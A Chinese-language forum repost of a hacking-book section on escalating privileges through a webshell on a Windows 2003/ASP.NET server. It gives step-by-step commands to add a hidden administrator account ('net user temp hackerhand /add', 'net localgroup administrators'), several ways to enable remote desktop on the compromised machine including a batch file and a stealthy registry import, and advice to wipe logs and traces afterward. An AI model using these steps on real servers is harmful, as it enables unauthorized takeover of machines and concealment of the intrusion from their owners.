设为首页收藏本站

 找回密码
 注册
搜索
热搜: 回贴
微赢网络技术论坛 门户 网络编程 ASP/.NET 查看内容

3.4.2 利用网站配置文件提升权限攻击案例(2)(图)

2010-1-12 20:26| 发布者: admin| 查看: 228| 评论: 0|原作者: 江月

3.4.2 利用网站配置文件提升权限攻击案例(2)
提升权限。网站默认支持ASP,对于大多数Windows 2003 Server服务器来说,其网站都会支持Asp.net,如果使用ASP木马不能提升权限,则可以通过Asp.net网页木马来提升权限。Asp.net类型的Webshell最著名的是Webadmin,其中它有一个通过数据库来执行sqlrootkit命令的功能。在Host中输入主机地址"127.0.0.1"或者是主机的真实IP地址,在SQL name中输入数据库用户"sa",在SQL Password中输入刚才获取的密码,然后在"Command"中分别命令"net user temp hackerhand /add"添加temp用户,其密码为"hackerhand",如图3-112所示。

(点击查看大图)图3-112连接数据库并添加temp用户
添加temp用户成功后,再在其中将temp用户添加到管理员组中,输入并执行"net localgroup administrators temp /add",如图3-113所示,然后将temp用户添加到Administrators权限组中。
说明
在添加用户时,有的服务器对密码有安全限制,例如必须是数字、大小写字母和特殊字符的组合,并且要求有一定的位数。添加用户后,虽然显示结果表示成功,但是还需要通过"net localgroup administrators"命令来进行核实,以确保添加用户成功。如图3-114所示,添加的temp用户已经成功。

(点击查看大图)图3-113添加temp用户到管理员组

(点击查看大图)图3-114查看已经添加的用户
实施控制。对于服务器来讲,最方便的办法就是直接开启3389,可以通过"netstat -an|find "3389""命令来查看本机是否开放3389端口,如图3-115所示,该计算机3389端口是对外开放的。

(点击查看大图)图3-115查看3389端口开放情况
通过查看端口命令虽然知道该计算机3389端口已经打开,但是也有可能是其他程序在监听本端口,因此还需要通过3389的终端使用情况查询命令"query user"来查看用户使用情况。如图3-116所示,该远程终端是可以使用的。
技巧
在提升权限的过程中可能需要开通被入侵计算机的远程终端服务,然后通过本地远程终端连接器连接对方3389端口,开启远程终端服务也称开启3389端口。开启3389端口有以下的一些方法。
① 通过mt的"mt -setupts"来安装终端服务。"Mt -chkts"可以查看3389终端开启情况。
② 使用rots.vbs脚本。Rots.vbs是由网名为"灰色轨迹zzzevazzz"写的一个VBS脚本,该脚本通过系统中自带的cscript.exe应用程序来执行,使用该脚本可以开启终端服务以及修改终端服务端口,其使用格式为:
cscript.exe rots.vbs ip user userpass port /r或cscript.exe rots.vbs ip user userpass port /fr

③ 使用bat命令。通过记事本建立一个bat文件,在其中分别输入以下内容:
echo [Components] > c:\sql

echo TSEnable = on >>sql

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

然后运行该批处理命令,重新启动计算机后,远程终端服务开启成功,该方法不能更改终端服务的端口。
④ 导入一个reg文件到需要开启终端服务的机器中。该方法主要是修改远程终端服务的端口及其相关设置,通过生成一个以reg为后缀的文件,将该文件导入到需要开启终端服务的计算机上。该方法比较隐蔽,通过服务管理器以及"net start"命令均不会发现终端服务已经启动。
⑤ 使用SQL注入软件启动3389服务。在Domain3.5以及教主的HDSI2.0 SQL等注入工具中均提供了开启3389终端服务功能,使用该类软件来开启3389的前提条件是运行Web服务的服务器必须存在SQL注入漏洞,而且数据库用户的权限较大,在SQL Server 2000中数据库用户必须为sa。

(点击查看大图)图3-116核实3389能否使用
清除痕迹和修补漏洞。在成功控制被入侵计算机后,需要清理日志记录文件、临时文件、最近访问文件等痕迹。清理痕迹后,可以对被入侵计算机进行安全漏洞修补,并通知管理员,该计算机存在安全漏洞。
小结
本案例在SQL注入漏洞攻击尤其有用,是典型的提升WebShell权限的一种方式;目前已经出现单独针对SQL Server数据库的WebShell,这种WebShell的隐蔽性较高。


收藏 分享 邀请

最新评论

相关分类

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-29 11:35 , Processed in 0.222484 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

返回顶部